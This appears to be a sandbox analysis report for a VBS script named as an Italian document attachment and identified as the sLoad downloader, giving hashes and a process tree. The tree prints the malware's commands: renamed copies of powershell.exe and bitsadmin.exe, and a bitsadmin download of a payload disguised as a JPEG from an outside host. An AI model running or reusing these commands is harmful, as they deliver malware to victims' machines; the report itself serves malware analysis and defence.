Overview

overview

10

Static

static

Allegato_d...50.vbs

windows7_x64

10

Allegato_d...50.vbs

windows10_x64

10

Analysis

  • max time kernel
    29s
  • max time network
    27s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    14-09-2020 12:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Allegato_doc_07501560150.vbs

  • Size

    4KB

  • MD5

    e307bc020a581429ed10ee79a4db315c

  • SHA1

    bdcd95f51bda66a11d0147f932f01245f715c1b9

  • SHA256

    96bd66aedb565c6d29e60d7e7880047749abcd1cfa2d7b27f612b7b32038ede5

  • SHA512

    79f815e81d3c70f097a001ba9f331f1ff8a8d82ae425348c994af777fa610cb28c4ce364c80e744177f051f860799f6716e25ca93dba573cc2bfb3c7116b2dde

Score
10/10
trojanstealersload

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

    trojanstealersload
  • Executes dropped EXE 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_07501560150.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zNOXGAdE.exe
      2⤵
        PID:1752
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
        2⤵
          PID:320
        • C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
          "C:\Users\Admin\AppData\Roaming\NOXGAdE.exe" /transfer tycgYf /download https://sapphireloading.com/sal/07501560150/maps.jpg C:\Users\Admin\AppData\Roaming\maps.jpg
          2⤵
          • Executes dropped EXE
          PID:1580

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
        Download Submit

      • C:\Users\Admin\AppData\Roaming\NOXGAdE.exe
        Download Submit

      • memory/320-1-0x0000000000000000-mapping.dmp

        Download

      • memory/1580-3-0x0000000000000000-mapping.dmp

        Download

      • memory/1752-0-0x0000000000000000-mapping.dmp

        Download